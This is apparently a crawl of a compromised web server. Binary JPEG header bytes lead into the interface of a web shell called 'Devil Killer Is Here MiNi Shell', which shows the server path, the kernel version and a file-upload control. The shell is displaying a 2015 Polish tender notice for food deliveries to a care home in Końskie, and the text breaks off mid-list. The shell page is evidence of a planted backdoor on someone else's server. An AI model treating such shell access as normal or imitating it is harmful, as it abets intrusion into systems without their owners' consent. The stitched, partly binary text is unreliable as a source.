JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151118/310478-N-2015.html

<p class="kh_header"><b>Końskie: Sukcesywne dostawy artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 310478 - 2015; data zamieszczenia: 18.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej Cichy Zakątek , ul. Warszawska 25, 26-200 Końskie, woj. świętokrzyskie, tel. 041 372-51-57, faks 041 372-51-57.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy artykułów spożywczych do magazynu DPS Cichy Zakątek w Końskich. Wykonawcy mogą złożyć oferty na dowolną ilość części.
Szczegółowy opis przedmiotu zamówienia stanowi kosztorys cenowy oddzielny dla każdej części - załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia.
Zamawiający informuje, że przy dostawie artykułów spożywczych będących przedmiotem zamówienia stosuje prawo opcji, oznacza to, że podane ilości są wielkościami maksymalnymi, które należy wycenić w kosztorysie cenowym.
Zamawiający, będzie odbierał artykuły sukcesywnie w miarę potrzeb. Natomiast gwarantowana ilość artykułów, które zostaną odebrane to 70 % artykułów wymienionych w kosztorysach cenowych. L.p.	Nazwa artykułu	Jedn.
miary	Ilość	Cena
brutto	Wartość  ogółem brutto
 
1	2	3	4	5	6
1.		Ćwiartka tylna z kurczaka (udka)	kg	2.100		
2.		Filet z kurczaka 	kg	600		
3.		Flaki wołowe	kg	100		
4.		Karczek wieprzowy b/k	kg	450		
5.		Kurczaki	kg	120		
6.		Łopatka wieprzowa b/k  	kg	1.500		
7.		Mięso gulaszowe z kurczaka	kg	100		
8.		Nogi wieprzowe 	kg	300		
9.		Ozory wieprzowe 	kg	75		
10.		Porcje rosołowe  z kurczaka bez  skrzydeł	kg	1.300		
11.		Schab wieprzowy b/k	kg	350		
12.		Serca drobiowe	kg	       80		
13.		Serca wieprzowe 	kg	100		
14.		Udziec wołowy  b/k	kg	200		
15.		Wątroba wieprzowa 	kg	80		
16.		Wątróbka z kurczaka	kg	     80		
17.		Żeberka wieprzowe paski	kg	400		
18.		Żołądki drobiowe	kg	100		
19.		Baleron 	kg	200		
20.		Blok szynkowy	kg	200		
21.		Boczek wędzony gotowany	kg	150		
22.		Kaszanka 	kg	200		
23.		Kiełbasa biała parzona	kg	300		
24.		Kiełbasa krakowska  	kg	300		
25.		Kiełbasa mielonka	kg 	300		
26.		Kiełbasa mortadela	kg	250		
27.		Kiełbasa parówkowa	kg	400		
28.		Kiełbasa podwawelska	kg	500		
29.		Kiełbasa szynkowa   	kg	500		
30.		Parówki drobiowe cienkie	kg	150		
31.		Parówki  wieprzowe cienkie	kg	150		
32.		Pasztet drobiowy 131g	sztuk	3.000		
33.		Pasztet drobiowy pieczony	kg	250		
34.		Pasztetowa wieprzowa 	kg	150		
35.		Pieczeń rzymska wieprzowa	kg	150		
36.		Polędwica drobiowa	kg	300		
37.		Polędwica sopocka	kg	150		
38.		Rolada schabowa	kg	250		
39.		Salceson  wieprzowy	kg	120		
40.		Szynka drobiowa	kg	250		
41.		Szynka konserwowa	kg	250		
42.		Szynka wieprzowa wędzona gotowana	kg	 200		
43.		Wędzonka krotoszyńska	kg	200		
44.		Słonina b/s	kg	160		
45.		Smalec	kg	150
1.		Jogurt naturalny 150g	sztuk	1.400		
2.		Jogurt naturalny 450g	sztuk	200		
3.		Jogurt owocowy 150g	sztuk	5.500		
4.		Kefir 400g	sztuk	450		
5.		Masło ekstra (kostka 200g)	kg	1.900		
6.		Mleko spożywcze 2 %	l	19.500		
7.		Mleko długoterminowe 2 %	l	500		
8.		Mleko zsiadłe 400g	sztuk	450		
9.		Ser żółty (twardy)	kg	300		
10.		Serek homogenizowany smakowy150 g	sztuk	4.000		
11.		Serek homogenizowany naturalny 150g	sztuk	800		
12.		Serek topiony 100g	sztuk	1.500		
13.		Serek wiejski 200g	sztuk	1.800		
14.		Śmietana 18 %- 24 %	l	900		
15.		Twaróg tłusty	kg	1.250 1.		Bułka 50 g	szt.	46.000		
2.		Bułka 400 g krojona	szt.	4.500		
3.		Bułka 400 g niekrojona	szt.	300		
4.		Bułka grahamka 100 g	szt.	6.000		
5.		Bułka tarta 500g	szt.	230 		
6.		Bułki słodkie 100g (z serem, marmoladą, jabłkiem, jagodami)	szt.	1.500		
7.		Chleb 1 kg krojony	szt.	9,500		
8.		Chleb razowy 500 g krojony	szt.	2.800		
9.		Rogal bez dodatku cukru 100g	szt.	1.800		
10.		Rogaliki drożdżowe drobne  
z marmoladą wyrób cukierniczy	kg	20		
11.		Ciastka kruche	kg	20		
12.		Pączki 100g	szt.	1301.		Ananasy puszka 565 g	szt.	200		
2.		Barszcz biały lub żurek /butelka 0,50 l/	szt.	650		
3.		Brzoskwinie w puszcze 820g	szt.	100		
4.		Budyń smaki różne 40g	szt.	1.500		
5.		Chrzan 190g	szt.	200		
6.		Cukier	kg	2.700		
7.		Cukier puder 400g	szt.	      50		
8.		Cukier waniliowy 32 g	szt.	50		
9.		Cynamon  mielony 15g	szt.	10		
10.		Drożdże 100g	szt.	100		
11.		Dżemy różne smaki 280g	szt.	2.800		
12.		Fasola czerwona konserwowa 400g	szt.	100		
13.		Galaretka owocowa smaki różne 75g	szt.	100		
14.		Gałka muszkatołowa mielona 15 g	szt.	8		
15.		Groszek konserwowy 400g	szt.	400		
16.		Herbata granulowana 100g	szt.	1.500 		
17.		Imbir mielony 20 g	szt.	8		
18.		Kakao 100g	szt.	40		
19.		Kasza jęczmienna	kg	650		
20.		Kasza manna 	kg	200		
21.		Keczup łagodny 500 g	szt.	150		
22.		Kisiel 40g	szt.	1.500		
23.		Koncentrat pomidorowy 30 % 950g	szt.	300		
24.		Kukurydza konserwowa 400g	szt.	    350		
25.		Kwasek cytrynowy 20g	szt.	    150		
26.		Liść laurowy 10g	szt.	120		
27.		Majeranek 10g	szt.	350		
28.		Majonez  630 g lub 630 ml	szt.	400		
29.		Mak 400g	szt.	10		
30.		Makaron (świderki, łazanki, kolanko, drobna muszelka)	kg	1.200		
31.		Makaron wstążka - nitka     	kg	500		
32.		Makaron zacierka 0,25 kg	szt. 	750		
33.		Masło roślinne 250g	szt.	1.500		
34.		Mąka pszenna	kg	    1.200		
35.		Mąka tortowa	kg	100		
36.		Mąka ziemniaczana	kg 	    60		
37.		Miód naturalny25g	szt.	5.000		
38.		Musztarda 190 g	szt.	150		
39.		Ocet 0,50 l	szt.	      15		
40.		Ogórek konserwowy  870g/0,90 l	szt.	100		
41.		Olej 1 l 	szt.	750		
42.		Papryka konserwowa  870g/0,90 l	szt.	100		
43.		Papryka słodka 20 g	szt.	150		
44.		Pieprz mielony 20 g	szt.	700		
45.		Płatki jęczmienne 0,50 kg	szt.	    300		
46.		Płatki kukurydziane 0,50 kg	szt.	350		
47.		Płatki owsiane 0,50 kg	szt.	   350		
48.		Proszek do pieczenia 36g	szt.	60		
49.		Przyprawa do potraw 200 g	szt.	1.100 		
50.		Przyprawa w płynie 1 l	szt.	40		
51.		Przyprawa do drobiu 20 g	szt.	50		
52.		Ryż 	kg	1.000		
53.		Seler konserwowy 300 g	szt.	300		
54.		Sól jodowana 	kg	600		
55.		Ziele angielskie 15 g (całe ziarna)	szt.	    250		
56.		Żelatyna 50 g	szt.	      150		
1.		Filet z miruny ze skórą	kg	800		
2.		Karp filet	kg	15		
3.		Rolmopsy	kg	12		
4.		Śledzie po kaszubsku	kg	150		
5.		Makrela wędzona	kg	300		
6.		Paprykarz szczeciński 130 g	szt.	1.500		
7.		Szprot w oleju 300 g	szt.	900		
8.		Szprot w pomidorach 300g	   szt.	900		
9.		Śledź po wiejsku	kg	150		
10.		Tuńczyk w sosie własnym 170 g	szt.	500
		
1.		Brokuły 	kg	700		
2.		Fasolka szparagowa 	kg	800		
3.		Leczo 	kg	200		
4.		Mieszanka kompotowa 
opak 2,50 kg	kg	1.100		
5.		Mieszanka warzywna 
7 składnikowa	kg	300		
6.		Szpinak 	kg	100		
7.		Włoszczyzna  	kg	500		
8.		Uszka z kapustą i grzybami 300g	szt.	120		
1.	Arbuzy	kg	250		
2.	Banany	kg	800		
3.	Botwina	pęczki	100		
4.	Brokuły	sztuk	300		
5.	Brukselka	kg	80		
6.	Buraki	kg	1.900		
7.	Cebula	kg	1.000		
8.	Cukinia	kg	150		
9.	Cytryny	kg	70		
10.	Czosnek	sztuk	300		
11.	Fasola Jaś	kg	160		
12.	Fasola szpar	kg	250		
13.	Grejfruty	kg	80		
14.	Gruszki	kg	100		
15.	Groch łuszczony	kg	140		
16.	Gruszki suszone	kg	1		
17.	Grzyby susz	kg 	1,50		
18.	Jabłka	kg	3.000		
19.	Jabłka susz.	kg	4		
20.	Jajka	sztuk	36.000		
21.	Kalafior	sztuk	250		
22.	Kapusta biała	kg	450		
23.	Kapusta czerwona	kg	150		
24.	Kapusta kiszona	kg	1.300		
25.	Kapusta młoda	sztuk	450		
26.	Kapusta pekińska	kg	200		
27	Koper	pęczki	550		
28.	Mandarynka	kg	500		
29.	Marchew	kg 	2.500		
30.	Nektarynka	kg	200		
31.	Ogórek kiszony	kg	600		
32.	Ogórek świeży	kg 	400		
33.	Papryka czerwona	kg	150 		
34.	Pieczarki	kg	500		
35.	Pietruszka	kg	500		
36.	Natka pietruszki	pęczki	600		
37.	Pomarańcze	kg	200		
38.	Pomidory	kg	1.350		
39.	Pory	kg 	180		
40.	Rzodkiewka	pęczki	150		
41.	Sałata zielona	sztuk	900		
42.	Seler	kg	900		
43.	Szczaw	kg	15		
44.	Szczypior	pęczki	400		
45.	Śliwki	kg	30		
46.	Śliwki suszone	kg	2		
47.	Truskawki	kg	80		
48.	Winogrona	kg	60		
49.	Wiśnie	kg	50		
50.	Ziemniaki	kg	26.000.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.41.21.00-0, 15.50.00.00-3, 15.81.00.00-9, 15.80.00.00-6, 15.60.00.00-4, 15.33.00.00-0, 15.41.11.00-3, 15.20.00.00-0, 15.33.11.70-9, 15.89.60.00-5, 03.22.00.00-9, 15.30.00.00-1, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
             Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia wg wzoru   
             załącznik nr 4 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1). Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, 
według wzoru zał. nr 4 do SIWZ.
2). W sytuacji, gdy wykonawca będzie polegał na zasobach innych podmiotów zgodnie 
z art. 26 ust. 2b ustawy PZP zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia w szczególności przedstawiając 
w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Z dokumentu winno wynikać jednoznacznie o wyrażeniu woli udzielenia wykonawcy odpowiedniego zasobu, w jaki sposób te zasoby zostaną wykorzystane przy wykonaniu zamówienia, jakiego charakteru stosunki łączą wykonawcę z innym podmiotem, w jakim zakresie i w jakim okresie inny podmiot będzie brał udział w wykonaniu zamówienia.
3).Jeżeli w kraju zamieszkania osoby, lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio dla miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem - wystawione z odpowiednia datą wymaganą dla tych dokumentów
4) Upoważnienie dla osób reprezentujących wykonawcę, a jeżeli wykonawcę reprezentuje pełnomocnik także pełnomocnictwo, określające zakres umocowania</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny jednostkowe brutto każdego asortymentu określone dla części 1,2,3,4,5,6 będą 
     tożsame z podanymi w ofercie i obowiązywać jako niezmienne w całym okresie   
     obowiązywania niniejszej umowy.
Ceny jednostkowe brutto asortymentu określone dla części 7  warzywa i owoce mogą  
     ulec zmianie, jednak nie wcześniej, niż po upływie 5 miesięcy od dnia podpisania umowy.
     Kolejne zmiany cen jednostkowych mogą nastąpić po upływie 2 miesięcy od poprzedniej.
Ceny jednostkowe mogą ulec zmianie wyłącznie wówczas, jeżeli cena rynkowa 
     danego artykułu ulegnie zmianie (zwiększeniu bądź obniżeniu) o co najmniej 10% 
     w stosunku do ceny z dnia podpisania umowy  lub aneksu ustalającego nową cenę      i utrzyma się na tym poziomie przez co najmniej 14 dni.
     W wyżej opisanym przypadku zmiany cen jednostkowych należy sporządzić aneks do
     umowy, który będzie obowiązywał po upływie 7 dni od daty jego podpisania.
 Ceny jednostkowe będą badane na podstawie cennika Warszawskiego Rolno - 
 Spożywczego Rynku Hurtowego S.A. Bronisze www.bronisze.com.pl
(średnie ceny tego samego artykułu).
 Z wnioskiem o zmianę cen może wystąpić każda ze stron, dokumentując wystąpienie 
Jeżeli w czasie obowiązywania umowy zmienione zostaną przepisy prawa określające 
     wysokość stawki podatku od towarów i usług VAT, wykonawca będzie uprawniony przy  
     wystawieniu faktury do naliczenia wynagrodzenia brutto z zastosowaniem stawki podatku 
     obowiązującej w dacie wystawienia faktury.
     W wyżej opisanym przypadku zmiany należnego wynagrodzenia nie będzie wymagane  
     sporządzenie aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_konskie_zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Cichy Zakątek 
ul. Warszawska 25 26 -200 Końskie Dział Żywienia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2015 godzina 10:30, miejsce: Dom Pomocy Społecznej Cichy Zakątek 
ul. Warszawska 25 26 -200 Końskie Dział Techniczno - Gospodarczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, drób, wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Ćwiartka tylna z kurczaka (udka)	kg	2.100		
2.		Filet z kurczaka 	kg	600		
3.		Flaki wołowe	kg	100		
4.		Karczek wieprzowy b/k	kg	450		
5.		Kurczaki	kg	120		
6.		Łopatka wieprzowa b/k  	kg	1.500		
7.		Mięso gulaszowe z kurczaka	kg	100		
8.		Nogi wieprzowe 	kg	300		
9.		Ozory wieprzowe 	kg	75		
10.		Porcje rosołowe  z kurczaka bez  skrzydeł	kg	1.300		
11.		Schab wieprzowy b/k	kg	350		
12.		Serca drobiowe	kg	       80		
13.		Serca wieprzowe 	kg	100		
14.		Udziec wołowy  b/k	kg	200		
15.		Wątroba wieprzowa 	kg	80		
16.		Wątróbka z kurczaka	kg	     80		
17.		Żeberka wieprzowe paski	kg	400		
18.		Żołądki drobiowe	kg	100		
19.		Baleron 	kg	200		
20.		Blok szynkowy	kg	200		
21.		Boczek wędzony gotowany	kg	150		
22.		Kaszanka 	kg	200		
23.		Kiełbasa biała parzona	kg	300		
24.		Kiełbasa krakowska  	kg	300		
25.		Kiełbasa mielonka	kg 	300		
26.		Kiełbasa mortadela	kg	250		
27.		Kiełbasa parówkowa	kg	400		
28.		Kiełbasa podwawelska	kg	500		
29.		Kiełbasa szynkowa   	kg	500		
30.		Parówki drobiowe cienkie	kg	150		
31.		Parówki  wieprzowe cienkie	kg	150		
32.		Pasztet drobiowy 131g	sztuk	3.000		
33.		Pasztet drobiowy pieczony	kg	250		
